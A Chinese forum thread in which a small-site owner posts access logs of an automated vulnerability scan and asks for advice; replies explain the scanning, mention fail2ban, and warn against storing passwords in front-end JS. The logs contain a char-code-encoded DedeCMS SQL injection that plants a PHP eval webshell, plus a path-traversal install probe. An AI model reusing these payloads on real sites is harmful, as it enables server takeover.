这是一个创建于 2303 天前的主题,其中的信息可能已经有所发展或是发生改变。
182.61.17.130 - - [18/Jul/2018:20:05:03 +0800] "POST /include/dialog/select_soft_post.php HTTP/1.1" 404 27 "-" "python-requests/2.19.1" "-"
182.61.17.130 - - [18/Jul/2018:20:05:03 +0800] "GET /plus/kqcpvfwieniq.php HTTP/1.1" 404 27 "-" "python-requests/2.19.1" "-"
182.61.17.130 - - [18/Jul/2018:20:05:03 +0800] "GET /plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=114&arrs2[]=101&arrs2[]=97&arrs2[]=100&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=120&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=109&arrs2[]=79&arrs2[]=111&arrs2[]=110&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=57&arrs2[]=32&arrs2[]=35 HTTP/1.1" 404 27 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" "-"
182.61.17.130 - - [18/Jul/2018:20:05:03 +0800] "GET /plus/ad_js.php?aid=19 HTTP/1.1" 404 27 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" "-"
182.61.17.130 - - [18/Jul/2018:20:05:03 +0800] "GET /plus/read.php HTTP/1.1" 404 27 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" "-"
182.61.17.130 - - [18/Jul/2018:20:05:03 +0800] "GET /install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php HTTP/1.1" 404 169 "-" "python-requests/2.19.1" "-"
182.61.17.130 - - [18/Jul/2018:20:05:03 +0800] "GET /forum.php HTTP/1.1" 404 27 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" "-"
182.61.17.130 - - [18/Jul/2018:20:05:03 +0800] "GET /bbs/forum.php HTTP/1.1" 404 27 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" "-"
182.61.17.130 - - [18/Jul/2018:20:05:03 +0800] "POST /index.php?m=vod-search HTTP/1.1" 404 27 "-" "python-requests/2.19.1" "-"
查了下 GET 的东西,都是一些漏洞?有什么好的建议吗,我的网站是查成绩的,就主页面一个多选项,选择一个选项后输入密码,密码在 JS 里面,混淆过,然后密码对了就跳转到一个文件夹里面(成绩页面),这样会影响安全吗?TX 云的建站主机
182.61.17.130 - - [18/Jul/2018:20:05:03 +0800] "GET /plus/kqcpvfwieniq.php HTTP/1.1" 404 27 "-" "python-requests/2.19.1" "-"
182.61.17.130 - - [18/Jul/2018:20:05:03 +0800] "GET /plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=114&arrs2[]=101&arrs2[]=97&arrs2[]=100&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=120&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=109&arrs2[]=79&arrs2[]=111&arrs2[]=110&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=57&arrs2[]=32&arrs2[]=35 HTTP/1.1" 404 27 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" "-"
182.61.17.130 - - [18/Jul/2018:20:05:03 +0800] "GET /plus/ad_js.php?aid=19 HTTP/1.1" 404 27 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" "-"
182.61.17.130 - - [18/Jul/2018:20:05:03 +0800] "GET /plus/read.php HTTP/1.1" 404 27 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" "-"
182.61.17.130 - - [18/Jul/2018:20:05:03 +0800] "GET /install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php HTTP/1.1" 404 169 "-" "python-requests/2.19.1" "-"
182.61.17.130 - - [18/Jul/2018:20:05:03 +0800] "GET /forum.php HTTP/1.1" 404 27 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" "-"
182.61.17.130 - - [18/Jul/2018:20:05:03 +0800] "GET /bbs/forum.php HTTP/1.1" 404 27 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" "-"
182.61.17.130 - - [18/Jul/2018:20:05:03 +0800] "POST /index.php?m=vod-search HTTP/1.1" 404 27 "-" "python-requests/2.19.1" "-"
查了下 GET 的东西,都是一些漏洞?有什么好的建议吗,我的网站是查成绩的,就主页面一个多选项,选择一个选项后输入密码,密码在 JS 里面,混淆过,然后密码对了就跳转到一个文件夹里面(成绩页面),这样会影响安全吗?TX 云的建站主机
10 条回复 • 2018-09-09 00:30:23 +08:00
 |
1
lcorange 2018-07-18 20:31:20 +08:00  2
这是有人恶意 ip 遍历,用已知漏洞挨个试。你只是不小心被扫到了,不是针对你,不影响安全。
看着不舒服的话可以了解下 fail2ban |
 |
2
gmodsimplegame OP @lcorange emmm 建站主机可以吗,好像只能上传文件,不能敲命令的
|
 |
3
opengps 2018-07-18 20:38:50 +08:00 via Android
自动扫描攻击,我后台经常提示这类
|
|
4
lcorange 2018-07-18 20:40:06 +08:00
@gmodsimplegame 那就不用管他了,做好备份,万一中招删了重建就可以了。
|
|
5
gmodsimplegame OP okk
|
 |
6
letitbesqzr 2018-07-18 21:14:09 +08:00
自动扫描而已,很多的,不用担心, 比如 /plus/download.php 这个,dedecms 的一个漏洞
|
 |
7
abc612008 2018-07-24 11:19:02 +08:00 via Android
密码存 JS 里...?
|
|
8
gmodsimplegame OP @abc612008 小网站,也就输入一个密码然后跳转到另一个 html,班级里做的玩玩的,我除了 JS 混淆没什么方法存密码了...有什么好的建议吗?还是说用 MySQL
|
|
9
abc612008 2018-09-08 19:34:40 +08:00 1
密码是绝对不可以发到前端的,要在后端里比对。前端的混淆除了拖延破解时间以外没其他意义。
|
|
10
gmodsimplegame OP @abc612008 行吧,那以后我就用 mysql,谢谢了
|
Select Language